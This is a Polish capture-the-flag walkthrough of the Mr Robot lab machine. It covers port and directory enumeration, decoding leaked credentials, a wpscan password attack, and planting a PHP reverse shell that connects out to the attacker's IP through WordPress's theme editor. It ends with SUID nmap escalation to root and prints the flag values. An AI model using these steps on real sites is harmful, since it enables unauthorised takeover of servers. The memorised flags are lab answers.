WordPress 4.3.1.

*Enumeracja za pomoca nmap:*
```python
sudo nmap -sS -sV 10.10.194.170

Nmap scan report for 10.10.194.170
Host is up (0.054s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
```


*Nmap ujawnia 3 porty:*
2 są otwarte (http i https). 
SSH wydaje się być zamknięty.

*W tym momencie dokonuję enumeracji katalogu w celu wyszukania ukrytych
katalogów na serwerze www:*
```python
gobuster dir -u http://10.10.194.170 --wordlist /usr/share/wordlists/dirb/common.txt


===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.194.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/20 06:56:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 213]
/.htaccess            (Status: 403) [Size: 218]
/.htpasswd            (Status: 403) [Size: 218]
/0                    (Status: 301) [Size: 0] [--> http://10.10.194.170/0/]
/admin                (Status: 301) [Size: 235] [--> http://10.10.194.170/admin/]
/atom                 (Status: 301) [Size: 0] [--> http://10.10.194.170/feed/atom/]
/audio                (Status: 301) [Size: 235] [--> http://10.10.194.170/audio/]  
/blog                 (Status: 301) [Size: 234] [--> http://10.10.194.170/blog/]   
/css                  (Status: 301) [Size: 233] [--> http://10.10.194.170/css/]    
/dashboard            (Status: 302) [Size: 0] [--> http://10.10.194.170/wp-admin/] 
/favicon.ico          (Status: 200) [Size: 0]                                      
/feed                 (Status: 301) [Size: 0] [--> http://10.10.194.170/feed/]     
/image                (Status: 301) [Size: 0] [--> http://10.10.194.170/image/]    
/Image                (Status: 301) [Size: 0] [--> http://10.10.194.170/Image/]    
/images               (Status: 301) [Size: 236] [--> http://10.10.194.170/images/] 
/index.html           (Status: 200) [Size: 1104]                                   
/index.php            (Status: 301) [Size: 0] [--> http://10.10.194.170/]          
/js                   (Status: 301) [Size: 232] [--> http://10.10.194.170/js/]     
/intro                (Status: 200) [Size: 516314]                                 
/license              (Status: 200) [Size: 309]                                    
/login                (Status: 302) [Size: 0] [--> http://10.10.194.170/wp-login.php]
/page1                (Status: 301) [Size: 0] [--> http://10.10.194.170/]            
/phpmyadmin           (Status: 403) [Size: 94]                                       
/readme               (Status: 200) [Size: 64]                                       
/rdf                  (Status: 301) [Size: 0] [--> http://10.10.194.170/feed/rdf/]   
/robots               (Status: 200) [Size: 41]                                       
/robots.txt           (Status: 200) [Size: 41]                                       
/rss                  (Status: 301) [Size: 0] [--> http://10.10.194.170/feed/]       
/rss2                 (Status: 301) [Size: 0] [--> http://10.10.194.170/feed/]       
/sitemap              (Status: 200) [Size: 0]                                        
/sitemap.xml          (Status: 200) [Size: 0]                                        
/video                (Status: 301) [Size: 235] [--> http://10.10.194.170/video/]    
/wp-admin             (Status: 301) [Size: 238] [--> http://10.10.194.170/wp-admin/] 
/wp-content           (Status: 301) [Size: 240] [--> http://10.10.194.170/wp-content/]
/wp-config            (Status: 200) [Size: 0]                                         
/wp-includes          (Status: 301) [Size: 241] [--> http://10.10.194.170/wp-includes/]
/wp-cron              (Status: 200) [Size: 0]                                          
/wp-links-opml        (Status: 200) [Size: 227]                                        
/wp-load              (Status: 200) [Size: 0]                                          
/wp-mail              (Status: 500) [Size: 3064]                                       
/wp-login             (Status: 200) [Size: 2613]                                       
/wp-settings          (Status: 500) [Size: 0]                                          
/wp-signup            (Status: 302) [Size: 0] [--> http://10.10.194.170/wp-login.php?action=register]
/xmlrpc.php           (Status: 405) [Size: 42]                                                       
/xmlrpc               (Status: 405) [Size: 42]                                                       
                                                                                                     
===============================================================
2022/09/20 07:09:27 Finished
===============================================================
```

Gobuster wyszukał między innymi plik robots.txt.

*Pozbieram plik:*
```python
curl -s http://10.10.194.170/robots.txt
Wynik: 
User-agent: *
fsocity.dic
key-1-of-3.txt

curl -s http://10.10.194.170/key-1-of-3.txt
Klucz: 073403c8a58a1f80d943455fb30724b9

curl -s http://10.10.194.170/fsocity.dic
Wynik: Ten plik to słownik
```

*Pobranie słownika:*
```python
wget http://10.10.194.170/fsocity.dic
```

*Jednym z wyników skanowania było:*
/wp-admin (Status: 301) [Size: 238] [--> http://10.10.194.170/wp-admin/] 

*Wchodzę na tą stronę:*
```python
http://10.10.194.170/wp-admin
```

Po wpisaniu loginu admin i hasła admin nie można się zalogować.
Jednak aplikacja informuje o tym iż login jest nieprawidłowy.
"ERROR: Invalid username."
Dzięki temu łatwiej będzie określić login.

*Gobuster ujawnił równiez:*
/license (Status: 200) [Size: 309]                                    

*Pobieram:*
```python
curl -s http://10.10.194.170/license | tr -d "\n"
```

*Wynik to:*
what you do just pull code from Rapid9 or some s@#% since when did 
you become a script kitty?
do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=

*Rozkodowanie:*
```python
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
```

**Wynik:** elliot:ER28-0652


*Inna metoda to użycie wpscan znajac login i używając znalezionego słownika:*
```python
sort fsocity.dic | uniq > facility_sorted.txt
wpscan --url http://10.10.194.170 -t 50 -U elliot -P /home/kali/Desktop/Hacking/workspace/Zadania/Mr_Robot_CTF/facility_sorted.txt
```

*Wynik to:*
[!] Valid Combinations Found:
 | Username: elliot, Password: ER28-0652

Okazało się iż są to poświadczenia do strony http://10.10.194.170/wp-admin/

Na stronie pisze iż Wersja WordPress to 4.3.1.

Można poszukać dla niej exploita.

Ponieważ jestem administratorem, moge modyfikować szablony:

Jednym z rozwiązań jest zhakowanie aplikacji. 
Aby wysłać nam szablon internetowy, gdy przegląda sie konkretną stronę, 
w tym przypadku domyślną stronę odpowiedzi 404 Not Found.


**Tworzenie reverse shell:**
Do tego potrzebny jest kod webshell, który może być obsługiwany 
ze wspomnianej strony.

*W Kali Linux:*
```python
/usr/share/webshells
```

*Wybieram php-reverse-shell.php i tworzę kopie:*
```python
cp php/php-reverse-shell.php /home/kali/Desktop/Hacking/workspace/Zadania/Mr_Robot_CTF
```

*Teraz należy dostosować kod:*
```python
vim php-reverse-shell.php
```

*Fragment kodu gdzie należy wprowadzić IP Kali Linux oraz port:*
```python
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.18.105.140';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
```

*Teraz należy wkleić cały kod na stronę:*
```python
http://10.10.194.170/wp-admin/theme-editor.php
```

Przed wklejeniem kodu należy przejść do Apperarence i kliknąć 404.php
na pasku po prawej stronie

*W Kali Linux:*
```python
nc -nvlp 4444
``` 

*W przeglądarce należy przejść do nieistniejącej strony:*
```python
http://10.10.194.170/wordpress/wp-content/themes/twentyfifteen/404.php
```


*Mam shell, ale nie jest stabilny. Aby go ustabilizować, 
uruchamiam polecenie:*
```python
python -c 'import pty;pty.spawn("/bin/bash")'
```

```python
cd /home/robot
cat key-2-of-3.txt
```

*Klucz jest zakodowany w md5:*
https://crackstation.net/

Hasło to:
abcdefghijklmnopqrstuvwxyz

*Teraz należy się zalogowac do użytkownika robot:*
```python
su robot
password: abcdefghijklmnopqrstuvwxyz
cat key-2-of-3.txt
```

*Eskalacja przywilejów:*
*Uruchamiam polecenie, które wyszukuje wszystkie pliki 
z ustawionym bitem SUID:*
```python
find / -perm -u=s -type f 2>/dev/null
```

*Został wyszukany nmap:*
```python
/usr/local/bin/nmap
```

Sprawdzenie czy na stronie https://gtfobins.github.io/ 
istnieje nmap która pokazuje możliwe polecenie eskalacji uprawnień.

*Target:*
```python
nmap --interactive
!sh
```

**Jestem użytkownikiem root!!!**

*W katalogu root:*
```python
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
```
